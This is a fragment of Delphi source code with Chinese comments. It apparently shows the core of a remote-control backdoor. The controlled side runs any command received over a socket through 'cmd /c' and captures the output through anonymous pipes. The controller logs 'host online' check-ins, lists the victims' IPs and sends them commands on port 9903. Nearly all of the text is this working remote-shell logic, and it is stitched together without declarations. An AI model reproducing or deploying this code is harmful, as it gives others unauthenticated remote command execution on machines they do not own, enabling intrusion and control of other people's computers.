//进程通信还是使用最早的匿名管道方式
//接收到指令后,加'cmd /c'拼接成完整命令
Remotecmd:='cmd /c'+socket.ReceiveText;
lsa.nLength := SizeOf(SECURITY_ATTRIBUTES);
lsa.lpSecurityDescriptor := nil;
lsa.bInheritHandle := True;
//创建两个匿名管道用来读写信息
if CreatePipe(Readniming,Writeniming,@lsa,0) = false then
begin
cs1.Socket.SendText('不能创建匿名管道');
Freemem(ph);
Freemem(fname);
Exit;
end;
//创建进程,执行cmd命令
StrPcopy(fname,Remotecmd);
if CreateProcess(nil,fname,nil,nil,True,0,nil,nil,si,pi) = False then
begin
cs1.socket.SendText('不能创建进程');
Freemem(ph);
Freemem(fname);
Exit;
end;
While(true) do
begin
if not PeekNamedPipe(Readniming,ph,1,@cchReadBuffer,nil,nil) Then break;
If cchReadbuffer <> 0 then
begin
if Readfile(Readniming,ph^,4096,cchReadBuffer,nil) = False Then break;
ph[cchReadbuffer]:=Chr(0);
Memo1.Lines.Add(ph); //命令执行结果保存在Memo1里
end
else
if (WaitForSingleObject(pi.hProcess,0) = WAIT_OBJECT_0) Then break;
Sleep(500);
end;
ph[cchReadBuffer]:=Chr(0);
Memo1.Lines.Add(ph);
procedure TForm1.ss1ClientRead(Sender: TObject; Socket: TCustomWinSocket);
var
ip:string;
begin
ip:=socket.ReceiveText;
If Pos('Myip',ip)<>0 then
begin
showmessage('有主机上线!');
ip:=Copy(ip,pos('p',ip)+1,length(ip)-4);
listbox1.Items.Add(ip);
end
else
memo1.Lines.Add(ip);
end;
procedure TForm1.Button1Click(Sender: TObject);
var
i:integer;
ip:string;
begin
i:=0;
While i < listbox1.items.Count do
if listbox1.Selected[i] then //获取点选的被控端ip
begin
ip := Listbox1.Items[i];
cs1.Address := Trim(ip);
cs1.Port := 9903; //设置被控端的连接端口
cs1.Active := True; //开始连接
break;
end
else
i:=i+1;
cs1.Socket.SendText(edit1.Text); //发送指令给被控端
end;